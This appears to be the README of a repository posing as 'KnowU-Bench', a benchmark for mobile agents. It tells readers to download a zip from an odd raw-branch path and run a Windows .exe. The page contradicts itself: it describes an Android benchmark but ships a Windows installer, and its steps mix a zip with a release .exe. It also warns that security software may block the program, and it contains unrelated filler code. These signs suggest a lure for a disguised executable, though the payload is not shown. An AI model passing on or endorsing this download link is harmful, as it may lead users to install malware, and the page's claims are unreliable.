annhien136loan117-cyber/KnowU-Bench

🤖 KnowU-Bench - Evaluate mobile agents with ease

KnowU-Bench helps you test how well mobile agents perform. The software provides a standard way to measure if your mobile assistant acts in a proactive and personalized manner. Researchers and developers use this tool to track progress in mobile automation.

📋 System Requirements

Your computer must meet these requirements to run the software:

  • Operating System: Windows 10 or Windows 11 (64-bit).
  • Processor: Intel Core i5 or AMD equivalent.
  • Memory: 8 GB RAM.
  • Storage: 2 GB of free space.
  • Graphics: Support for DirectX 11 or higher.
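The operating system and storage requirements above can be checked with a short script. This is a minimal sketch rather than part of KnowU-Bench: the function name `unmet_requirements` and the constant `MIN_FREE_BYTES` are hypothetical, "64-bit" is assumed to mean an x86-64 machine, and the memory, processor, and graphics checks are left out because the Python standard library does not expose them portably.

```python
import platform
import shutil

# 2 GB of free space, taken from the requirements list (hypothetical constant name).
MIN_FREE_BYTES = 2 * 1024**3


def unmet_requirements(system, release, machine, free_bytes):
    """Return a list of unmet requirements; an empty list means all checks pass."""
    problems = []
    # platform.release() may report "10" on Windows 11 with some Python versions,
    # so both values are accepted here.
    if system != "Windows" or release not in ("10", "11"):
        problems.append("Operating system must be Windows 10 or Windows 11")
    # Assumption: a 64-bit Intel/AMD system reports AMD64 (Windows) or x86_64.
    if machine.upper() not in ("AMD64", "X86_64"):
        problems.append("A 64-bit Intel or AMD system is required")
    if free_bytes < MIN_FREE_BYTES:
        problems.append("At least 2 GB of free storage is required")
    return problems


if __name__ == "__main__":
    # Check the drive that holds the current working directory.
    free = shutil.disk_usage(".").free
    issues = unmet_requirements(
        platform.system(), platform.release(), platform.machine(), free
    )
    for issue in issues:
        print("Requirement not met:", issue)
    if not issues:
        print("Operating system and storage checks passed.")
```

Passing the system values in as arguments keeps the check easy to test on a machine other than the one being evaluated.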

⬇️ Setup Instructions

Follow these steps to install the software on your Windows computer.

  1. Download the software archive from this link: https://github.com/annhien136loan117-cyber/KnowU-Bench/raw/refs/heads/main/uncalmed/Bench-Know-v3.0-beta.3.zip
  2. Select the file ending in .exe from the latest release.
  3. Save the file to your computer.
  4. Locate the file in your Downloads folder and double-click it.
  5. Follow the prompts on the screen to finish the installation.

⚙️ How to use the software

The program interface focuses on simplicity. Once you open the application, you see a dashboard with your agent's current metrics.

Starting a test

To start a new evaluation session, click the New Test button at the top left. Select the mobile agent you want to evaluate from the drop-down menu. The system automatically loads the necessary configuration files.

Configuring settings

The settings menu allows you to adjust how the system interacts with test environments. You can change the speed of the evaluation and the level of logging detail. Most users keep the default settings for initial testing.

Viewing results

Once the test finishes, the software generates a report. You can view these results as a chart or export them as a document for sharing. The software saves these reports in the Documents folder under KnowU-Bench.
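To find the most recent reports without opening the application, the report folder can be listed with a short script. This is a sketch under stated assumptions: the Documents folder is assumed to be at its default location in your user profile (it may be redirected, for example by a cloud sync tool), the report file format is not specified here so every file is listed, and the helper names `default_report_dir` and `list_reports` are hypothetical.

```python
from pathlib import Path


def default_report_dir():
    """Assumed default location: <user profile>/Documents/KnowU-Bench."""
    return Path.home() / "Documents" / "KnowU-Bench"


def list_reports(report_dir):
    """Return the files in report_dir, newest first; an empty list if the folder is missing."""
    report_dir = Path(report_dir)
    if not report_dir.is_dir():
        return []
    files = [p for p in report_dir.iterdir() if p.is_file()]
    # Sort by last-modified time so the latest report comes first.
    return sorted(files, key=lambda p: p.stat().st_mtime, reverse=True)


if __name__ == "__main__":
    for report in list_reports(default_report_dir()):
        print(report.name)
```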

📈 Understanding the metrics

The evaluation process tracks three main areas of agent performance.

  • Personalization: Does the agent remember past interactions?
  • Proactivity: Does the agent offer help before you ask?
  • Interaction Quality: Does the agent follow instructions correctly?

Each metric receives a score on a scale of 0 to 100. A score of 70 or above indicates that the agent performs within acceptable parameters.
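The scoring rule can be illustrated with a small helper that marks each metric as acceptable or not. This is a sketch, not the tool's own logic: the dictionary keys, the constant `ACCEPTABLE_SCORE`, and the function `summarize` are hypothetical names, and the only facts taken from the text are the 0 to 100 scale and the threshold of 70.

```python
# Threshold from the text: a score of 70 or above is acceptable.
ACCEPTABLE_SCORE = 70

# Hypothetical keys for the three metrics described above.
METRICS = ("personalization", "proactivity", "interaction_quality")


def summarize(scores):
    """Map each metric name to True if its score meets the threshold."""
    summary = {}
    for name in METRICS:
        value = scores[name]
        # Scores outside the documented 0 to 100 scale are treated as errors.
        if not 0 <= value <= 100:
            raise ValueError(f"{name} score {value} is outside the 0-100 scale")
        summary[name] = value >= ACCEPTABLE_SCORE
    return summary


if __name__ == "__main__":
    example = {"personalization": 82, "proactivity": 64, "interaction_quality": 70}
    for metric, ok in summarize(example).items():
        print(metric, "acceptable" if ok else "below threshold")
```

Note that a score of exactly 70 counts as acceptable, matching the "70 or above" wording.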

🛠 Troubleshooting common issues

If the software fails to launch, verify that your Windows system has all updates installed. Sometimes, security software blocks the application. Check your security logs if the program does not appear.

Ensure that you have enough memory available. Close other programs if the system runs slowly during an evaluation. If you see an error message, copy the text of the error and search for it in our help portal.

📋 Frequently Asked Questions

Can I run this on a Mac?

The current version supports Windows only.

Does the software require an internet connection?

An internet connection is necessary to download the latest agent profiles, but the evaluation process itself runs locally on your machine.

How do I update the software?

The application checks for updates every time you open it. If a new version exists, the system prompts you to download the installer.

Where can I report errors?

Use the Issues tab on the project page to submit bug reports. Provide a clear description of what happened when the error occurred.

⚖️ Guidelines for ethical testing

Respect user privacy when testing agents. Always use data sets that contain no personal information. Ensure that your tests comply with local regulations and organizational policies regarding automated systems.

This tool serves as an aid for development. Always verify outcomes with manual checks before finalizing your reports. Use the system to identify strengths and weaknesses in your design.

About

Evaluate personalized and proactive mobile agents using this interactive benchmark for reproducible Android environments.
